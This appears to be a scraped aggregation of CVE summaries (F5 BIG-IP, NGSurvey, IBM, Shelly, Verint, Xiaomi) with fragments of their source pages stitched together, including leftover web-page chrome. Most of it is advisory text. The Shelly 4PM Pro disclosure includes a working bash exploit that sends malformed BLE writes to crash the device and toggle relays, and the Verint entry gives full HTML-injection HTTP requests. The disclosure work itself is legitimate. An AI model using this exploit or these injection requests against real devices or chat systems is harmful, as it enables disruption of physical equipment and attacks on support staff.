
A cross-site scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Configuration utility that allows an attacker to run JavaScript in the context of the currently logged-in user.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-38423: myF5

An authenticated attacker with guest privileges or higher can cause the iControl SOAP process to terminate by sending undisclosed requests.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVE-2023-38419: myF5


The BIG-IP Edge Client Installer on macOS does not follow best practices for elevating privileges during the installation process.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVE-2023-38418: myF5

OXID eShop Enterprise Edition 6.5.0 – 6.5.2 before 6.5.3 allows uploading files with modified headers in the administration area. An attacker can upload a file with a modified header to create a HTTP Response Splitting attack.

CVE-2023-38330: Security-Bulletins — OXID eSales Dokumentation

Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Customer Stories
    *   White papers, Ebooks, Webinars
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

WodenSec / **CVE-2022-46484** Public

*   Notifications
*   Fork 0
*   Star 1
    

Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys.

1 star 0 forks Activity

Star

Notifications

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Security
*   Insights

More

main

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

WodenSec Rename ngPass.py to CVE-2022-46484.py

6df43c3

Jan 11, 2023

Rename ngPass.py to CVE-2022-46484.py

6df43c3

**Git stats**

*   **4** commits

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

CVE-2022-46484.py

Rename ngPass.py to CVE-2022-46484.py

January 11, 2023 10:17

README.md

Create README.md

January 11, 2023 10:16

**README.md**

**CVE-2022-46484**

Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys.

**About**

Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to access and arbitrarily submit surveys.

**Resources**

Readme

Activity

**Stars**

**1** star

**Watchers**

**1** watching

**Forks**

**0** forks

Report repository

**Releases**

No releases published

**Packages**

No packages published  

**Languages**

*   Python 100.0%

CVE-2022-46484: GitHub - WodenSec/CVE-2022-46484: Information disclosure in password protected surveys in Data Illusion Survey Software Solutions NGSurvey v2.4.28 and below allows attackers to view the password to ac

IBM Robotic Process Automation 21.0.0 through 21.0.7.latest is vulnerable to unauthorized access to data due to insufficient authorization validation on some API routes.  IBM X-Force ID:  245425.

CVE-2023-23476: IBM Robotic Process Automation information disclosure CVE-2023-23476 Vulnerability Report

IBM SDK, Java Technology Edition 7.1.5.18 and 8.0.8.0 could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By sending specially-crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system.  IBM X-Force ID:  236069.

CVE-2022-40609: IBM SDK, Java Technology Edition code execution CVE-2022-40609 Vulnerability Report

Shelly 4PM Pro four-channel smart switch 0.11.0 allows an attacker to trigger a BLE out of bounds read fault condition that results in a device reload.

**Authentication Bypass via an out-of-bounds read vulnerability**

**Introduction**

The Security Team at \[exploitsecurity.io\] uncovered a vulnerability in the Shelly 4PM Pro four-channel smart switch \[ Firmware Version 0.11.0\]. Under certain conditions the vulnerability allows an attacker to trigger an BLE out of bounds read fault condition that results in a device reload. It was found that this vulnerability could enable an attacker to switch on relays, if coupled with the systems scripting feature.

This blog looks to describe:

*   Affected Product Overview
    
*   The Shelly 4PM PRO under the hood
    
*   Attack Surface Mapping
    
*   Threat Modeling
    
*   Vulnerability Description
    
*   Responsible Disclosure
    
*   Proof of concept
    
*   Timeline
    

**Affected Product Overview**

The Shelly Pro 4PM is a DIN rail mountable four-channel smart switch with power measurement capabilities. Enhanced with all the gen2 firmware flexibility, LAN connectivity and color graphic display, it provides professional integrators with many more options for end customer solutions. It can work standalone in a local Wi-Fi network or it can also be operated through cloud home automation services. Shelly Pro 4PM can be accessed, controlled and monitored remotely from any place where the User has internet connectivity, as long as the device is connected to a Wi-Fi router and the Internet. Shelly Pro 4PM has an embedded Web Interface which can be used to monitor and control the device, as well as adjust its settings.

Product: Shelly PRO 4PM (GEN2)

Affected Firmware Version: 0.11.0

**Under the hood**

Under the hood the Shelly PRO 4PM runs on an ESP32-D0WDQ6 MCU. The device utilizes diverse technologies to help either control or communicate signals/traffic flows between the device and its respective management device. Under normal operating procedure the device uses RPC calls over HTTP in order to monitor and control the device through its associated mobile application. The device utilizes the RPC protocol for control and notifications. RPC messages can be sent using HTTP. In the event that authentication is enabled there is a requirement to include a nonce, cnounce and hashed response by the device being controlled. The hashed response is constructed using information from an initial RPC call that elicits a HTTP 401 response. This response contains randomized data that is used to instantiate the hashed response in a subsequent request. For more information relating to the RPC functionality visit - https://shelly-api-docs.shelly.cloud/gen2/General/Authentication

**Attack Surface Mapping**

The following attack surface map was determined:

Attack Surface Map

As can be seen the device is integrated into its environment using multiple distinct protocols including ModBus, HTTP, MQTT, RPC, WebSocket and UDP. All of which require access to either a physically connected ethernet or alternatively over RF/WiFi in order to interoperate.

As stated within the Product Overview \[above\], the device can be controlled either locally (within the host network) or alternatively remotely over the internet. The device is managed through the use of the associated Shelly Mobile Application. This application fulfills the function of monitoring of the device as well as control.

**Threat Modeling**

The predominate interaction with the device occurs using authenticated HTTP RPC calls. RPC is used to make the appropriate call for a specific function.

Using the above Attack Surface Mapping as a reference point, the Security Team at \[exploitsecurity.io\] considered multiple use cases in order to tease out weaknesses within the product. The following describes the hypothesis for each individual use case and the ultimate result in each case.

**WIFI and Physical Ethernet Vectors**

*   **Authentication bypass by capture replay (Authentication Enabled)** **_Use Case:_**
    

Although the Security Team noted that it was possible to replay unauthenticated control flows, the Security Team wanted to examine the possibility of capturing authenticated control packets and subsequently replaying these packets to gain control of the device.

**_Result:_**

These efforts were essentially thwarted through adequate randomized hashing mechanisms which included nonce, cnonce values and SHA256 encryption.

*   **Brute Forcing the authentication mechanism**
    

**_Use Case:_**

The Security Team found that it was possible to reverse the hashing algorthim. This algorithm incorporates the values username, password, realm, nonce, cnounce and a nc value. These values are then concatenated using ':' as a delimiter. A SHA256 hashing algorithm is then used to produce the resultant hash.

**_Result:_**

It was determined that due to the per request randomized values used to construct a correct hash that brute forcing was improbable.

**BLE Vector**

The Security Team turned their attention to the investigation of the BLE stack on the device. As far as could be determined the BLE functionality was currently ONLY used for device inclusion (Scanning/Importing of the device into the mobile application). Shelly devices are used as Bluetooth proxies to obtain data from devices which send data advertisements (notifications that do not require an active connection).

*   **Affecting the BT Stack to elicit an unknown system state**
    

**_Use Case:_**

Due to the use of an underlying ESP32 BT SoC, which are regularly found to harbor a known BLE vulnerability (https://asset-group.github.io/disclosures/braktooth/), it was posited that it may be possible to affect an unknown system state using this type of attack vector.

Prying further into how BLE may be used on earlier Shelly devices, it was uncovered that it may have been used to service formatted JSON RPC calls.

An overview of the RPC via BLE process is detailed below:

*   Under normal circumstances the device expects RPC JSON data (RPC calls use JSON format) to be written to BLE characteristic handle 0x0008.
    
*   The RPC calls noted here are the same as the ones previously mentioned above in this blog post.
    
*   In order to make ready the BLE stack to accept this data there is a requirement for the length of the required RPC JSON data to be written to BLE write handle 0x000d.
    
*   The data written at this location informs the characteristic read/write handle 0x0008 that it should expect 'x' amount of byte(s).
    
*   These bytes correspond to the length of the RPC JSON data.
    

**_Result:_**

Understanding the above RPC via BLE process the Security Team looked at possible ways to trigger the posited out-of-bounds read vulnerability.

The Security Team found that in order to produce a consistent fault condition, that it was possible to set an arbitrary length, through a write to BLE handle 0x000d followed by a subsequent write to read/write handle 0x0008.

The subsequent write to handle 0x0008, using a larger length of input data than was expected, would ultimately result in a device reset condition.

**Additional Feature**

As an additional feature the Shelly PRO 4PM allows for a scripting feature to be manually configured. This feature allows for automated tasks to be triggered upon certain events.

Example of such events may include

*   Toggling of relays
    
*   Monitoring of the status of the devices' cover.
    

**Chained Attack**

The Security Team found that by chaining the BLE fault condition together with the Shelly PRO scripting feature, that it was possible to coerce the device into execution of the pre-configured script which would ultimately result in the toggling of the on-board relay.

This behavior was noted as affecting the device configured with or without authentication enabled.

**Responsible Disclosure**

The Security Team at \[exploitsecurity.io\], reached out to the vendor to ensure that a patch was released prior to public disclosure. However, as of the time of this disclosure, no patch has been applied.

**Proof of Concept**

The proof of concept code wraps the GATTTOOL utility into a functional exploit.

#!/bin/bash

IFS\=
failed\=$false
RED\="\\e\[31m"
GREEN\="\\e\[92m"
WHITE\="\\e\[97m"
ENDCOLOR\="\\e\[0m"
substring\="Connection refused"

banner()
    {
        clear
        echo \-e "${GREEN}\[+\]\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\[+\]"
        echo \-e "${GREEN}|   Author : Security Team \[${RED}exploitsecurity.io${ENDCOLOR}\]              |"
        echo \-e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
        echo \-e "${GREEN}|   CVE: CVE-2023-33383                                      |"
        echo \-e "${GREEN}\[+\]\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\[+\]"
        echo \-e "${GREEN}\[Enter key to send payload\]${ENDCOLOR}"
    }

banner
read \-s \-n 1 key
if \[ "$key" \= "x" \]; then
    exit 0;
elif \[ "$key" \= "" \]; then
    gattout\=$(sudo timeout 5 gatttool \-b c8:f0:9e:88:92:3e \--primary)
    if \[ \-z "$gattout" \]; then
        echo \-e "${RED}Connection timed out${ENDCOLOR}"
        exit 0;
    else
    sudo gatttool \-b c8:f0:9e:88:92:3e \--char\-write\-req \-a 0x000d \-n 00000001 \>/dev/null 2\>&1
    echo \-ne "${GREEN}\[Sending Payload\]${ENDCOLOR}"
    sleep 1
    if \[ $? \-eq 1 \]; then
       $failed\=$true
       exit 0;
    fi
    sudo gatttool \-b c8:f0:9e:88:92:3e \--char\-write\-req \-a 0x0008 \-n ab \>/dev/null 2\>&1
    sleep 1
    if \[ $? \-eq 1 \]; then
        $failed\=$true
        echo \-e "${RED}\[\*\*Exploit Failed\*\*\]${ENDCOLOR}"
        exit 0;
    else
       sudo gatttool \-b c8:f0:9e:88:92:3e \--char\-write\-req \-a 0x0008 \-n abcd \>/dev/null 2\>&1
       sleep 1
       for i in {1..5}
       do
          echo \-ne "${GREEN}."
          sleep 1
       done
       echo \-e "\\n${WHITE}\[Pwned!\]${ENDCOLOR}"
    fi
fi
fi

**Timeline**

1.  1st May 2023 - Reached out to vendor via https://support.shelly.cloud/en/support/tickets/new?ticket\_form=report\_an\_issue for initial report disclosure. Created a support ticket (https://support.shelly.cloud/en/support/tickets/36432).
    
2.  3rd May 2023 - Support Ticket removed from shelly support site
    
3.  3rd May 2023 - Reached out to support@shelly.cloud
    
4.  4th May 2023 - Received communications from support@shelly.cloud. Sent through proof of concept steps.
    
5.  9th May 2023 - Received email confirmation from support@shelly.cloud advising that weakness is being further examined by shelly developers
    
6.  9th May 2023 - Registered for CVE-2023-33383
    
7.  9th June 2023 - Received confirmation from vendor of issue replication
    
8.  29th May 2023 - CVE reference: CVE-2023-33383 assigned (MITRE)
    
9.  2nd August 2023 - Public Disclosure Published
    

_Please see Shelly change log for updates_ https://shelly-api-docs.shelly.cloud/gen2/changelog/

CVE-2023-33383: CVE-2023-33383

Verint Engagement Management 15.3 Update 2023R2 is vulnerable to HTML injection via the user data form in the live chat.

Verint live-chat is an application part of Verint Engagement Management (version 15.3 Update 2023R2) that makes it possible for users on a website to ask questions through a chat box. The questions are answered by an employee via the Verint dashboard.  
It is possible to inject HTML code into the "User Data" form in the live-chat.

When we create a new chat an API call is made. In this JSON API call, it is possible to inject HTML code into the following parameters: "customerFirstName", "customerEmail", "customerLocale" and "refererURL".

    POST /chat/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 234
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    {"customerFirstName":"<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>",
    "customerEmail":"<h1>ee@recoil.nl</h1>",
    "customerLocale":"<h1>nl</h1>",
    "chatLaunchMode":"CHAT_ONLY",
    "refererURL":"<h1>https://recoil.nl<h1>",
    "launchCode":"KanaChat",
    "launchIdentifier":"KanaChat"}
    

Take note of the "userId" in the response, we can use this to spawn a chat with the employee.

    HTTP/1.1 201 Created
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:44:58 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    Set-Cookie: JSESSIONID=Tsf70qRg5layXAoUlwgHYIrAC_3VFCKXjXtfiH1xE-KBpWrqsYyK!896618273; Path=/chat/; Secure; HttpOnly
    
    {"userName":"AAAAAAAAAAAAAAAAAAAAAAAAA",
    "userLoginId":"9678-648618303ce0f6327e41ba6a332e392376e615eb048a",
    "userId":"vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am","_links":{"self":{"href":"/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"event":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"queuedstatus":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/queuedstatus?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

With the following request we can spawn a chat box.

    POST /chat/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 41
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    [
    	{
    		"type":"MessageSent",
    		"text":"123test"
    	}
    ]
    

Response:

    HTTP/1.1 200 OK
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:45:07 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    
    {"events":[],"_links":{"self":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"nextevent":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

By now the employee should get a notification of a new incoming message. When the chat opens the HTML injection takes place. As seen in the red square in the screenshot below.

When we inspect the source of the webpage we see that it has interpret the HTML code into the website as shown in the screenshot below.

CVE-2023-33257: Verint Live-chat HTML injection

A vulnerability has been discovered in Xiaomi routers that could allow command injection through an external interface. This vulnerability arises from inadequate filtering of responses returned from the external interface. Attackers could exploit this vulnerability by hijacking the ISP or an upper-layer router to gain privileges on the Xiaomi router. Successful exploitation of this flaw could permit remote code execution and complete compromise of the device.

小米欢迎广大优秀的安全专家和安全研究团队加入小米漏洞响应计划（VDP），共同为全球亿万小米用户提供安全守护。您可通过在产品安全中心的安全漏洞响应页面了解小米的漏洞处理流程和漏洞提交方式。

小米对披露的相关安全漏洞信息，不承诺任何明示、默示和法定的担保，包括但不限于对适销性、适用性及不侵权的担保，您理解对您披露的安全漏洞信息仅作为您评估安全风险和做出安全决策的参考，您基于漏洞信息进行的任何行为的风险和后果由您自行承担。在任何情况下，小米对任何损失，包括直接，间接，偶然，必然的商业利润损失或特殊损失均不承担责任。

Source

CVE